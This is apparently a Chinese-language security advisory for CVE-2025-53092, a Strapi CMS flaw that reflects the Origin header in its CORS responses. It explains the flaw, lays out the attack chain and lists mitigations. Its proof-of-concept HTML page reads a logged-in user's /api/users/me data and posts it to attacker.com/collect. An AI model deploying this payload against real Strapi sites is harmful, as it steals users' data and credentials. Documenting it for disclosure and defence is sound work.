CVE-2025-53092：Strapi CMS默认CORS配置错误漏洞

漏洞信息

漏洞编号

CVE-2025-53092

漏洞类型

CORS配置错误

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Strapi（开源无头内容管理系统）

漏洞概述

CVE-2025-53092是Strapi开源无头内容管理系统（Headless CMS）中存在的一个CORS（跨域资源共享）配置错误漏洞。该漏洞存在于Strapi 5.20.0之前的默认安装版本中。默认配置下，Strapi会将HTTP请求中的Origin头原样反射回Access-Control-Allow-Origin响应头中，而未进行任何验证或白名单过滤。这种不安全的配置使得任何外部恶意网站都可以向Strapi后端API发送携带用户凭证的跨域请求。攻击者可以通过在不同源（例如不同端口）托管恶意网站，利用浏览器自动携带Cookie等凭证的特性，窃取用户敏感数据或执行未授权操作。该漏洞的CVSS 3.1评分为6.5分，属于中危级别，主要影响机密性（高），对完整性和可用性无影响。该漏洞需要用户交互（如访问恶意网站）才能触发，但无需认证即可利用。Strapi官方已在5.20.0版本中修复了此问题，建议所有使用受影响版本的用户尽快升级。由于Strapi作为流行的开源CMS被广泛应用于各类网站和应用的内容管理，该漏洞可能影响大量部署实例，数据泄露风险较高。

技术细节

CORS（Cross-Origin Resource Sharing，跨域资源共享）是浏览器实施的一种安全机制，用于控制不同源之间的资源访问。服务器通过Access-Control-Allow-Origin响应头来声明哪些外部域可以访问其资源。

在Strapi 5.20.0之前的默认安装中，服务器端的CORS中间件存在配置缺陷：当接收到带有Origin头的跨域请求时，Strapi直接将Origin头的值反射到Access-Control-Allow-Origin响应头中，而没有进行任何域名白名单验证或来源校验。

正常的CORS安全配置应当是：服务器预先定义一个可信域名白名单，仅当请求的Origin头匹配白名单中的域名时，才在Access-Control-Allow-Origin中返回对应的值，否则拒绝该跨域请求。

漏洞利用原理：
1. 攻击者在自己的恶意网站（attacker.com）上编写JavaScript代码
2. 该代码使用fetch()或XMLHttpRequest向目标Strapi服务器（victim-strapi.com）发起跨域请求
3. 请求设置withCredentials: true，浏览器会自动附加目标站点的Cookie
4. Strapi服务器收到请求后，将attacker.com原样写入Access-Control-Allow-Origin响应头
5. 浏览器检查响应头认为请求合法，允许JavaScript读取响应内容
6. 攻击者成功窃取用户数据或以用户身份执行API操作

此漏洞的危害在于：即使目标API需要认证，由于浏览器自动携带Cookie，攻击者可以在用户已登录的情况下冒充用户访问API，获取敏感数据如用户信息、API Token、内容数据等。

攻击链分析

STEP 1

步骤1：搭建恶意网站

攻击者在自己的服务器上托管一个包含恶意JavaScript代码的网页，该网页部署在与目标Strapi实例不同的源（不同域名、端口或协议）。

STEP 2

步骤2：诱导受害者访问

攻击者通过钓鱼邮件、社交工程或其他方式诱导已登录目标Strapi管理后台的用户访问恶意网站。

STEP 3

步骤3：发起跨域请求

恶意网页中的JavaScript代码使用XMLHttpRequest或fetch API向目标Strapi API发起请求，并设置withCredentials为true，使浏览器自动附带目标站点的认证Cookie。

STEP 4

步骤4：服务器反射Origin头

Strapi服务器（5.20.0之前版本）将请求中的Origin头值原样写入Access-Control-Allow-Origin响应头，未做任何验证。

STEP 5

步骤5：浏览器放行响应

浏览器检查CORS响应头发现Access-Control-Allow-Origin与请求源匹配，认为请求合法，将响应数据暴露给恶意页面的JavaScript。

STEP 6

步骤6：数据窃取

恶意JavaScript读取到包含敏感信息的API响应数据，并将其发送到攻击者控制的服务器完成数据窃取，可能包括用户凭证、API Token、内容数据等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CORS Misconfiguration Exploit PoC for CVE-2025-53092 -->
<!-- Save as attacker.html and host on a different origin (e.g., different port) -->
<!-- Target: Strapi instance running on http://victim-strapi.com:1337 -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-53092 PoC</title>
</head>
<body>
    <h1>CORS Misconfiguration Exploit</h1>
    <div id="result"></div>
    <script>
        // Target Strapi API endpoint
        const targetURL = 'http://victim-strapi.com:1337/api/users/me';

        // Step 1: Create XMLHttpRequest with credentials
        const xhr = new XMLHttpRequest();
        xhr.open('GET', targetURL, true);
        xhr.withCredentials = true; // Send cookies/credentials with the request

        // Step 2: Define callback to handle response
        xhr.onreadystatechange = function() {
            if (xhr.readyState === 4) {
                if (xhr.status === 200) {
                    // Step 3: Exfiltrate stolen data to attacker server
                    const stolenData = xhr.responseText;
                    document.getElementById('result').innerText = 'Exploited: ' + stolenData;

                    // Send stolen data to attacker's collection server
                    fetch('http://attacker.com/collect', {
                        method: 'POST',
                        body: JSON.stringify({ data: stolenData })
                    });
                } else {
                    document.getElementById('result').innerText = 'Status: ' + xhr.status;
                }
            }
        };

        // Step 4: Send the cross-origin request
        xhr.send();

        // Alternative using fetch API
        /*
        fetch(targetURL, {
            method: 'GET',
            credentials: 'include', // Include cookies
            headers: {
                'Content-Type': 'application/json'
            }
        })
        .then(response => response.json())
        .then(data => {
            console.log('Stolen data:', data);
            // Exfiltrate to attacker server
            fetch('http://attacker.com/collect', {
                method: 'POST',
                body: JSON.stringify(data)
            });
        })
        .catch(error => console.error('Error:', error));
        */
    </script>
</body>
</html>

影响范围

Strapi < 5.20.0

防御指南

临时缓解措施

在无法立即升级到5.20.0版本的情况下，建议采取以下临时缓解措施：1）修改Strapi的中间件配置文件（config/middlewares.js），手动配置cors选项的origin字段为可信域名白名单，禁止使用通配符或反射Origin头；2）在反向代理层（如Nginx）配置严格的CORS策略，仅允许特定来源的跨域请求；3）为所有认证Cookie添加SameSite=Strict属性，限制跨站请求携带凭证；4）部署WAF规则检测和阻止异常的跨域请求；5）监控Strapi访问日志，及时发现可疑的跨域API调用。